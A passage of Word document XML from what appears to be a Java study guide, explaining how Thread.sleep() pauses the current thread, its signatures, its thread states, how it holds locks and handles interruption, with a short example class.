      <w:bookmarkStart w:id="267" w:name="_Toc196307747"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Thread.sleep() method, and what does it do internally</w:t>
      </w:r>
      <w:r w:rsidR="00C836C6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="267"/>
    </w:p>
    <w:p w14:paraId="28CC193F" w14:textId="4CF449E4" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Thread.sleep() Method:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F15E61"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The Thread.sleep() method is a static method in the Thread class in Java, and it is used to pause the execution of the current thread for a specified period (in milliseconds or nanoseconds).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EBE7693" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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Purpose of Thread.sleep():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD795E2" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1115"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It causes the </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>currently executing thread</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>sleep (pause execution)</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a given duration, allowing other threads to execute or allowing time for system resources to be used elsewhere.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689DC695" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1115"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It is typically used for </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>introducing delays</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or for </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>pausing the thread</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a fixed time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D826E9" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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Method Signature:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5977E3"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public static void sleep(long millis) throws InterruptedException;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2558FEA2"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public static void sleep(long millis, int nanos) throws InterruptedException;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622D450C" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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Parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBEC009" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>millis</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The number of milliseconds the thread should sleep.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19DA21F1" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1116"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>nanos</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (optional): The additional time in nanoseconds to be added to the millis. This is used when you want more precise control over the sleep time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6054DA03" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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What Does It Do Internally?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="323C9F86" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1117"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When Thread.sleep() is called, the current thread moves to the </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"timed waiting"</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AC0A9E0" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1117"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The thread does not release any locks it holds while sleeping (i.e., unlike wait() or notify(), it does not require synchronization).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C41DA2E" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1117"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The thread will remain in the </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"timed waiting"</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> state for the specified duration or until it's </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>interrupted</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755BEE73" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1117"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">After the sleep time elapses, the thread becomes </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> again and is eligible to be scheduled for execution by the JVM.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D7A684" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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Thread State During Sleep:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="061BEFCC" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1118"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">When a thread enters sleep(), it is placed in the </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"TIMED_WAITING"</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> state.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78CB106A" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1118"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The thread remains in this state for the specified time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2141B243" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1118"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">After the sleep time has passed, it transitions back to the </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>"RUNNABLE"</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> state, where it can be executed again by the thread scheduler.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706082A3" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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Behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4180A04D" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1119"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Does not release any locks</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If the thread holds any lock, it does not release it during the sleep period. It will continue holding the lock until it wakes up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9271D3" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1119"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Can be Interrupted</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A thread sleeping via Thread.sleep() can be interrupted by another thread, which will throw an InterruptedException. If interrupted, the thread will stop sleeping and handle the exception.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5325B346" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1119"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Time Granularity</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: The actual time the thread sleeps is subject to the operating system's time slicing and the precision of the system clock. The actual sleep duration may be slightly longer than requested, but it will not be shorter.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="685B5593" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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Example Usage:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EEDDBE"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public class SleepExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BD86BB"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static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E6A36E"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Thread starts...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78187139"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBC95BC"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Sleep for 3 seconds (3000 milliseconds)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49C93B37"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hread.sleep(3000);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47F198BA"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catch (InterruptedException e) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7CF90E"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Thread was interrupted!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476B4DA0"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7A8DCE29"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Thread resumes after sleeping...");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2AEF56"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632C7435"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B72F769" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86"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Key Points to Remember:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448A4F09" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1120"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Thread.sleep() is </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>static</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and applies to the current thread, meaning it affects the thread that calls it.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0906E896" w14:textId="77777777" w:rsidR="00812E86" w:rsidRPr="004E218C" w:rsidRDefault="00812E86" w:rsidP="004E218C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1120"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It is commonly used for </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>introducing delays</w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in execution, </w:t>
      </w:r>
      <w:r w:rsidRPr="004E218C">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>polling</w:t>
